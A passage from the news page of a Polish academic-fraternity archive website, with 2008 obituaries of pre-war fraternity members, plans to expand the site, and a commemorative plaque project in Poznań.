realizację tego projektu. Jak wspomniano strona techniczna serwisu w języku angielskim doczekała się już realizacji. Obecnie konieczne jest jedynie przetłumaczenie strony na język angielski. Koszt tłumaczenia niemal 200 stron zamieszczonych na stronie tekstów został oszacowany na ok. 2000 zł. Za wszelką pomoc w tym względzie będziemy zobowiązani (vide Finansowanie).

_________________________________________________________________________________________

Włodzimierz Głogowski, spotkanie Patrytów, Warszawa lata 80-te (?)

+ Włodzimierz Jacek Głogowski, Patryta (1914-2008)

Dnia 28 maja 2008 r. zmarł w Warszawie F! Włodzimierz Jacek Głogowski, rocznik 1914, absolwent Szkoły Wyższej Gospodarstwa Wiejskiego, pomolog, ostatni żyjący członek Korporacji Patria.

Requiescat in pace.

_________________________________________________________________________________________

Rozszerzenie strony Archiwum Korporacyjnego

Strona główna witryny Archiwum Korporacyjnego - Archiwum i Muzeum Polskich Korporacji Akademickich

W najbliższym czasie strona internetowa Archiwum Korporacyjnego ulegnie znacznemu rozszerzeniu. Prosimy o wybaczenie, jeśli wystąpiłyby przejściowe niedogodności techniczne:)

W ramach prowadzonych prac między innymi dodanych zostanie około 20 podstron, w tym kilkanaście stron poświęconych kolejnym korporacjom akademickim. Na stronie znajdą się między innymi nowe korporacje wileńskie (Batoria, Conradia, Filomatia Vilnensis), warszawskie (Lechicja, Sarmatia, Patria), lwowska (Śląsk), poznańskie (Surma, Chrobria, Silesia, Masovia, Roma) oraz krakowska (Silingia).

Spośród wszystkich przedwojennych środowisk korporacyjnych tym razem omówienia doczeka się najwięcej, bo aż pięć korporacji poznańskich. Wynika to z faktu, że po tych korporacjach znajduję się najwięcej zachowanych w Archiwum pamiątek. Własnych podstron doczekają się także trzy korporacje wileńskie oraz trzy korporacje warszawskie. Mimo intensywnych poszukiwań w ostatnim czasie udało odnaleźć się jedynie pojedyncze insygnia korporacyjne ze Lwowa oraz Krakowa, co skutkuje niemożnością przedstawienia większej ilości korporacji z tych ośrodków. Jeszcze gorsze rezultaty uzyskano, jeśli chodzi o inne środowiska korporacyjne (Lublin, Gdańsk, korporacje spoza terenów II Rzeczypospolitej).

Wszystkim osobom, które przyczyniły się do niniejszego rozszerzenia witryny Muzeum Polskich Korporacji Akademickich jesteśmy bardzo wdzięczni!

Za wszelką pomoc, a w szczególności stworzenie możliwości przedstawienia kolejnych, dotąd szerzej nieomówionych na stronie korporacji będziemy bardzo zobowiązani.

_________________________________________________________________________________________

Tomasz Szweycer, Komers Jagiellonii 26 VI 1990 r.

+ Tomasz Zbigniew Szweycer, Jagiellon (1916-2008)

Dnia 2 maja 2008 r. zmarł w Warszawie jeden z ostatnich żyjących członków Korporacji Akademickiej Jagiellonia Tomasz Zbigniew Szweycer.

Urodzony dnia 16 kwietnia 1916 r. Tomasz Szweycer był absolwentem gimnazjum Towarzystwa Ziemii Mazowieckiej oraz Wyższej Szkoły Handlowej.

Requiescat in pace.

__________________________________________________________________________________________

Nowe tablice pamiątkowe - w 25. rocznicę odsłonięcia tablic korporacyjnych w krużgankach klasztoru oo. Dominikanów w Poznaniu

Tablice korporacyjne, krużganki klasztoru oo. Dominikanów, Poznań lata 80-te

W trakcie prac związanych z prowadzeniem Archiwum Korporacyjnego wielokrotnie nasuwała się myśl o konieczności uczczenia wielu zasłużonych, dla niepodległości i rozwoju państwa, polskiej kultury i nauki, a nierzadko zupełnie zapomnianych, członków korporacji akademickich.

Inicjatywa ta podjęta została przez Stowarzyszenie Filistrów Poznańskich Korporacji Akademickich, które za wsparciem Poznańskiego Koła Międzykorporacyjnego zainicjowało prace, których celem jest wykonanie i umieszczenie w latach 2008-2010 trzech tablic korporacyjnych poświęconych: korporantom-powstańcom wielkopolskim, korporantom-rektorom Uniwersytetu Poznańskiego i korporantom-ofiarom mordu katyńskiego. Stroną merytoryczną projektu zajmuje się Archiwum Korporacyjne, a organizacyjno-finansową Fundacja “Polskie Korporacje Akademickie”.

Okazją do podjęcia tych działań jest z jednej strony 25. rocznica odsłonięcia tablic korporacyjnych w krużgankach klasztoru oo. Dominikanów w Poznaniu, a z drugiej strony przypadające w najbliższym czasie okrągłe rocznice wybuchu Powstania Wielkopolskiego (2008, 90-ta rocznica), powstania Uniwersytetu (2009, także 90-ta rocznica) oraz rocznica mordu katyńskiego (2010, 70-ta rocznica). Zapraszamy do udziału w projekcie (vide Tablice pamiątkowe).

__________________________________________________________________________________________

+ dr Józef Krzyżaniak, Chrobrak (1911-2008)

Józef Krzyżaniak, Korporacja Chrobria, Poznań lata 30-te

Dnia 26 marca 2008 r. zmarł w Poznaniu w 98. roku życia jeden z nestorów poznańskiego ruchu korporacyjnego dr Józef Krzyżaniak, członek K! Chrobria oraz członek honorowy K! Magna-Polonia.

Dr Józef Krzyżaniak urodził się dnia 16 lutego 1911 r. w Szamotułach. Ukończył Gimnazjum im. księdza Piotra Skargi, a następnie Wydział Lekarski Uniwersytetu Poznańskiego. W 1930 r. wstąpił do K! Chrobria. W okresie wojny brał udział w konspiracji, za co otrzymał w okresie powojennym godność “Weterana Walk o Niepodległość”. Przez niemal 60 lat pozostawał aktywny zawodowo jako lekarz internista.

Od lat 80-tych był aktywnym członkiem odradzającego się ruchu korporacyjnego w Poznaniu. Tworzył Stowarzyszenie Filistrów Poznańskich Korporacji Akademickich, aktywnie wspierał odrodzenie w 2002 r. K! Chrobria oraz w. 2004 r. K! Magna-Polonia, a w 2006 r. powstanie Poznańskiego Koła Międzykorporacyjnego. W 2001 r. jako pierwszy z przedwojennych korporantów zdecydował się przekazać zachowane pamiątki korporacyjne do tworzącego się Archiwum Korporacyjnego (vide Archiwum Korporacyjne). W 2007 r. został z nim zarejestrowany wywiad w ramach akcji Ostatni Filistrzy.

Był jednym z najbardziej zasłużonych i najbardziej szanowanych członków środowiska Poznańskiego Koła Międzykorporacyjnego. Requiem aeternam dona eis Domine et lux perpetua luceat eis.

__________________________________________________________________________________________

Zygmunt Augustowski z Konwentu Polonia, akcja Ostatni Filistrzy, Warszawa 3 VIII 2007 r.

+ Zygmunt Augustowski, Polonus (1913-2008)

W Wielki Czwartek dnia 20 marca 2008 r. zmarł w Warszawie w wieku 95 lat Zygmunt Augustowski z Konwentu Polonia.

Zygmunt Augustowski z wykształcenia prawnik, porucznik Wojska Polskiego, żołnierz września 1939 r., członek ZWZ-AK, Kedywu, uczestnik m.in. akcji “Wachlarz” oraz wyzwolenia Wilna “Ostra Brama”, więziony w czasie wojny przez Niemców i Rosjan, po zajęciu Wilna przez Sowietów członek organizacji Niepodległość, w okresie powojennym do 1956 r. przez wiele lat więziony przez władze komunistycznej Polski, odznaczony orderem Virtuti Militarii oraz trzykrotnie Krzyżem Walecznych.

Zygmunt Augustowski przyczynił się do reaktywacji Konwentu Polonia. Był jednym z najbardziej zasłużonych Konwentowiczów. Requiescat in pace.

_________________________________________________________________________________________

+ prof. Eligiusz Preisler, Surmita (1908-2008)

Prof. Eligiusz Preisler

Dnia 24 lutego 2008 r. w wieku niemal stu lat zmarł w Poznaniu prof. Eligiusz Preisler, jeden z dwóch ostatnich żyjących członków Korporacji Surma.

Prof. dr hab. Eligiusz Preisler urodził się dnia 1 grudnia 1908 r. w Jarocinie. Tam też ukończył w 1927 r. gimnazjum i w tym samym roku rozpoczął studia na Wydziale Lekarskim Uniwersytetu Poznańskiego. W 1929 r. został przyjęty do Korporacji Akademickiej Surma. Po wojnie kierował Studium Wychowania Fizycznego Akademii Medycznej w Poznaniu, a po utworzeniu Katedry Medycyny Sportu został mianowany jej kierownikiem. Później kierował także Katedrą Fizjologii. Był autorem i współautorem ponad 200 prac naukowych, opiekunem licznych prac magisterskich, promotorem 6 doktoratów, recenzentem 11 prac doktorskich i 5 habilitacji. Działał w Poznańskim Towarzystwie Przyjaciół Nauk i licznych lekarskich towarzystwach naukowych. Niemal do końca życia pozostawał aktywny zawodowo. Requiescat in pace.

__________________________________________________________________________________________

Vivat Filister!

Dnia 16 lutego 2008 r. 97. rocznice urodzin obchodził jeden z nestorów poznańskiego środowiska korporacyjnego dr Józef Krzyżaniak, członek K! Chrobria, członek honorowy K! Magna-Polonia, zasłużony dla powstania Archiwum Korporacyjnego (vide Archiwum Korporacyjne). Ad multos annos!

O Archiwum  |  Muzeum Korporacyjne  |  Aktualności  |  Kontakt  |   English © Archiwum Korporacyjne     Nota prawna  |  Mapa serwisu  | 
Szukaj    »
created by { re.PUBLIK }